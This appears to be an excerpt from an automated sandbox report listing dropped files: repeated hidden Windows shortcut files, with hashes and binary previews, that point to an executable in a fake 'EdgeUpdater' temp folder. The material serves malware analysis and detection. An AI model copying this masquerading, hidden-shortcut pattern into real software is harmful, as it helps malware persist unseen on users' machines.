                Preview:L..................F....".....X:3...z.{[3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\Desktop\file.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:10 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.935797345001403
                Encrypted:false
                SSDEEP:24:8ERigD3lXPXQvRdgKdZtgKxtKSAwav/42eMKUBqygm:8CTD3lfAvRQ241vgHyg
                MD5:2C7E7A362FF34BA1B40B8C9D354BB073
                SHA1:1491BE4F61B10FAAEC734129E0B45005D236D29E
                SHA-256:2836A58B38096D1D50C3342BEA57735282817C55AA0686A3C6D0958FADEB1C51
                SHA-512:AC0698966802AD92FC1B658D12EB32576D8708415EFB89195B49C9F47E745278DAB4F76933E5DA55874ABB88C2FEA5E9A69B15A0985B4990A7B66E5C450030D4
                Malicious:false
                Preview:L..................F....".....X:3.....X:3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53.....p:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYD...Temp..:......EW<2CYD.....^......................z.T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...........................BS..E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:16 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940355392804974
                Encrypted:false
                SSDEEP:24:8lLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8l9JD3lfAvRAt41vgHyg
                MD5:C9FCC4C10E1D7D93ECC7E6292DEA4F35
                SHA1:D26A9D7CEE474B83FD2BBA5633B7C750929EE151
                SHA-256:AA6ADF4895E7BF9218D1B0430DF98266905758878CC9E400C11E0AA16EED55CE
                SHA-512:BF5843ADBE7129DF0B3B60927499CE719395E37077DD5A8FFDCBF281E5F7F6C8DC670DBB29383ED49564865FEBEA52AF2456D2A1D49CDF908499E80F49A46A17
                Malicious:false
                Preview:L..................F....".....X:3....}.a3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:00 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939195300123907
                Encrypted:false
                SSDEEP:24:80RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8yJD3lfAvRAt41vgHyg
                MD5:DDB4B72A0CFD7A324D17C68537F49101
                SHA1:0415ED553FB7A9C78BB57DC8C352CF87DCC84AED
                SHA-256:D1A3A88F44E77C7C91956810570228D5E35DA519226DE20E74A1E8E5E092F69D
                SHA-512:DDBC6A95625160C1D80623FDF519AD1AEB5005C7D44947C3FC8D89073895BF7748BF597422FC7152B56CA015109DF8FCCAC16E6DC5C648D085CB8A44A2B74AEB
                Malicious:false
                Preview:L..................F....".....X:3....rX3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:24 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.941998608356436
                Encrypted:false
                SSDEEP:24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
                MD5:1FE8BBAE1C2ACFA0C0F1297100023D48
                SHA1:10D971A3DE3AAD971EBA10C721AFE54DC0E6942E
                SHA-256:454660931D390CD4D9AA189850CA3263D02017C060703C8EF6CA10409330DD2D
                SHA-512:32FECB96320C2E3ABB7A9A22634D259E5476B89763993BA0BDB6BEEF75A1A9C118B58FFC5CB4EE8E113E70A5A307572E1930F835BAFB80F6F053E90AE48AC591
                Malicious:false
                Preview:L..................F....".....X:3......B3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:49 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.941691766625289
                Encrypted:false
                SSDEEP:24:8CRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8EJD3lfAvRAt41vgHyg
                MD5:EA31A132DF6F472C8F551F4B6841C820
                SHA1:CA1AB3B48A8ADA1F7B420F1C65BD16EAC689D7D3
                SHA-256:924F4293F285575B9563D7E2CFAF3141135184D60DB46A011E69921A278352DA
                SHA-512:5D6BF2613CB9683BA0203FEE9D97515730AE1B15BED0486582AF1BE974BB10E79BEA72A2DFBE8B03678F2ABE7340F0E50838545C826E6152C1A7AA3AC8B3A43D
                Malicious:false
                Preview:L..................F....".....X:3...G.Q3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:09 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939093983521603
                Encrypted:false
                SSDEEP:24:83RRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8fJD3lfAvRAt41vgHyg
                MD5:C11BAC0F4ABAA2113D71A65560FE6F60
                SHA1:0A54672FCE0C7F24B64C59BD6D0F94E28F573E32
                SHA-256:431E67D233C68F863678812BEF7B0466A9E353B98F8183DCA8A2580ECFA82E2D
                SHA-512:906DE6C0A57DE168F0A869186F690DE4580EE28897A81EDF5612E51BA5981936E3A924D9845E3A3611316EE427F326D5CD5BF9AB3086A3003A0EB646A52B9B32
                Malicious:false
                Preview:L..................F....".....X:3...^.S]3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:21 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939456899594942
                Encrypted:false
                SSDEEP:24:8NeRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8yJD3lfAvRAt41vgHyg
                MD5:41963B10055F98B592277CE3EDE0C3BA
                SHA1:2BA67C3E61B8FB842A5BC4E2A17BF9A20B08A88D
                SHA-256:AC7C771BF2F60AA5EDAC11486DD287B2FF226E4776393DEF053C305B66EC709E
                SHA-512:CE5DFEDE6EB15C55B34003B528437A407C7DF110AA8267E93CE87C384A6F3515B67202AFDA14548BFDBADD54EED8DEDE09AB22D1DF5DC4B49CF9D9D639CC472B
                Malicious:false
                Preview:L..................F....".....X:3...sN.@3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:51 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940727753975689
                Encrypted:false
                SSDEEP:24:86RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8MJD3lfAvRAt41vgHyg
                MD5:EE860F2409BA2E8417107FFC3D5E0E2F
                SHA1:DF581BE7AAE9909365FF8707D82A86B422852B43
                SHA-256:F9CA4BDBDA8523E27423F306D46CFFFD6510BA2D096680CCE12DB0FDEE8D2437
                SHA-512:E4C958CCAE9A66117B256F4FFBB00515B3DCB4693259790E8E974A540E8996C235B08E05521E9A1381103A8A5062384BB3A0E5BC8821122C990589C263DF5E47
                Malicious:false
                Preview:L..................F....".....X:3......R3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:18 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937963265326578
                Encrypted:false
                SSDEEP:24:82VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8IJD3lfAvRAt41vgHyg
                MD5:35AA3C92E28D4E4E380D5E11B939FE2A
                SHA1:2F418F20F31C83F2B4C73EA41CA672AF5354FF4F
                SHA-256:0D43754B11DFC9D400EA4F67DD5A6B69911FA9BCDB005406273F6105164712E6
                SHA-512:2D7F71E8EDE941C764028285D43F1BDCA33F1FF66B15E427B4F3606764025AD8B8F904B93F1C09717B7B9A8749D81C02B3B91A84235F3D3683BA15EDC3BF7885
                Malicious:false
                Preview:L..................F....".....X:3....4.b3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:12 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940092326785316
                Encrypted:false
                SSDEEP:24:8yRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:80JD3lfAvRAt41vgHyg
                MD5:D269270B4D66111A4B8DD7A4101A5D57
                SHA1:1551CBC89D89FF95578681891B3990EB107D1EFB
                SHA-256:683D5AD41C88755BCD0C9713642A4A4C19F8AEC8E74B571BC757B4460596B8AE
                SHA-512:A07B88AB60BAB6D388C61A74449284877EED3815B364CFF10872149630B474306FFCA3ED0F007B961671C4FF16186FF45FA64589B042C9A0926F4B5FC85A733A
                Malicious:false
                Preview:L..................F....".....X:3..."=.;3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:29 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.933574856165677
                Encrypted:false
                SSDEEP:24:8SRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8UJD3lfAvRAt41vgHyg
                MD5:23F103ADEBEA8296606ACF71E07AD190
                SHA1:0AD84ABFA47A03B4B30F86EEF9B101AFE3942818
                SHA-256:A4315B96E3481BA5258A6C01342A365345C5250FE602B207E529C6556A646BC7
                SHA-512:1F4C29AA887940B2A2F70386C82D87755228B5AF0D15E4A98A6D2C32338D40AC06E7BA61D3C9FF5D59C42DA170035B9D62198F7FDFFD57405E9B0F7AD1A22C74
                Malicious:false
                Preview:L..................F....".....X:3.....pE3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:43 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939763741326085
                Encrypted:false
                SSDEEP:24:8wERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8BJD3lfAvRAt41vgHyg
                MD5:B4468AE9DB42B07DB1A0CF0DA89F9C62
                SHA1:DE8B8803C56ABF09CCDBB0866DF11E65E30A72DC
                SHA-256:2F680AA33CD09B35A2EC2A8D556A822CE3C303ECDB4DA3D65C216EC8F197427C
                SHA-512:3D946F6643478069B3E3AB133392BEACCEA6327E607429C2499B35976C7C5A224954C295208AF5E1DB5424357F533099568942E9F757B437CB32A80AA1E82DE2
                Malicious:false
                Preview:L..................F....".....X:3.....M3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:15 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.944730184533066
                Encrypted:false
                SSDEEP:24:8F6RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8FMJD3lfAvRAt41vgHyg
                MD5:7174EA0848616D74191C2958042D38BA
                SHA1:FB969F86F2AE5B1BA56535AD800DA5BAAB7E034E
                SHA-256:CAD1439D71AB1DFC573E8357D04F7D577584474EB927EF03B576A520D5CBFAD2
                SHA-512:0A5F4F0AC3186F007750D748B04D19B257A9EA16D241D57BED0C12ACE285CFE8C487A2E845379882233A0E5D63EC2470FCCFA1F94AA0A46158F37598C75DBF34
                Malicious:false
                Preview:L..................F....".....X:3...;.)=3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.941691766625291
                Encrypted:false
                SSDEEP:24:8vRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8pJD3lfAvRAt41vgHyg
                MD5:28BA6F4B51CCF9600C441CCF066EF54E
                SHA1:5F3AF6C483767D550DA5B37678D3C4D4433D29B4
                SHA-256:A0F5B2944172A961E3E3736BD58CAAD102EA18998D2D1780BE907ED054550134
                SHA-512:66567EF994C101A90B592A42053EED7EFCBAADA0535CEFA7A52E506EA66E9C4394AEC0BC2E8B470DA259BF4B16B6587D30D6FD52451B48821D77FEDAE96CB758
                Malicious:false
